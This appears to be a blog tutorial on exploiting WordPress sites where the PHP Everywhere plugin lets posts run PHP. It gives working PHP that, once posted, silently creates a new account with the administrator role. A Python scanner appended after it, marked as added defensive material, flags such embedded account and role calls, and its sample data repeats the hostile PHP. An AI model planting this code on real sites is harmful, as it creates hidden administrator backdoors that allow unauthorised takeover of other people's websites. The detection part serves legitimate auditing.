PHP is a scripting language that is commonly used for developing web applications. It lets a web page add interactivity, perform certain tasks and execute code.
However, PHP is also known as one of the most easily exploited scripting languages, especially when an attacker manages to insert a PHP script into a web page and run it.
So in this post, I am going to show you how to do a simple PHP exploit using just WordPress. First, make sure the WordPress site supports inserting PHP when posting. To check this, look for a plugin named PHP Everywhere, which should be present when formatting a line of the post.

As an example, I am exploiting PHP by running simple PHP code that creates a new user with administrator privileges. So type in the code as shown:
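<?php
// Load the WordPress environment so its user functions are available.
require 'wp-load.php';
$username = '[your username]';
$password = '[the password]';
$email_address = '[any email address]';
// Only create the account if the username is not already taken.
if (!username_exists($username)) {
    $user_id = wp_create_user($username, $password, $email_address);
    // Promote the new account to the administrator role.
    $user = new WP_User($user_id);
    $user->set_role('administrator');
}
?>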
This will create a new user account with the credentials entered in the code. The code runs when the post is submitted to the web page, and you will then be able to log in to this WordPress website with those credentials.
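From the defender's side, a site that allows PHP in posts can be audited for exactly this pattern. The following is an added example, not code from the original post: it scans post bodies for embedded PHP blocks that call WordPress account or role functions such as the ones used above. It assumes posts have been exported as (id, content) pairs; the function names scan_post and scan_posts and the sample posts are constructed for illustration.

```python
import html
import re

# An embedded PHP block; the closing tag may be omitted, so also stop at end of text.
PHP_BLOCK = re.compile(r"<\?php(.*?)(?:\?>|\Z)", re.DOTALL | re.IGNORECASE)
# WordPress calls that create accounts or change roles.
CALL = re.compile(r"\b(wp_create_user|wp_insert_user|set_role|add_role)\s*\(")
# A role call that names the administrator role directly.
ADMIN_ROLE = re.compile(r"""(?:set_role|add_role)\s*\(\s*['"]administrator['"]""")

def scan_post(post_id, content):
    """Return a finding for one post body, or None if no PHP block touches accounts."""
    text = html.unescape(content)  # stored content may be entity-encoded (&lt;?php)
    calls, grants_admin = [], False
    for block in PHP_BLOCK.findall(text):
        calls += CALL.findall(block)
        grants_admin = grants_admin or bool(ADMIN_ROLE.search(block))
    if not calls:
        return None
    return {"post_id": post_id,
            "calls": sorted(set(calls)),
            "severity": "critical" if grants_admin else "review"}

def scan_posts(posts):
    """Scan (post_id, content) pairs and return only the posts with findings."""
    return [f for f in (scan_post(pid, body) for pid, body in posts) if f]

# Constructed sample data (not from a real site).
SAMPLE_POSTS = [
    (101, "Prose that mentions wp_create_user() but contains no PHP tags."),
    (102, "<?php\nrequire 'wp-load.php';\n"
          "if (!username_exists($username)) {\n"
          "$user_id = wp_create_user($username, $password, $email_address);\n"
          "$user = new WP_User($user_id);\n"
          "$user->set_role('administrator');\n}?>"),
    (103, "&lt;?php wp_insert_user(array('user_login' => 'x'));"),
    (104, "<?php echo date('Y'); ?>"),
]

if __name__ == "__main__":
    for finding in scan_posts(SAMPLE_POSTS):
        print(finding)
```

A "critical" finding means a post both creates or modifies an account and assigns the administrator role; any finding is a reason to compare the site's administrator list against the accounts you expect.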
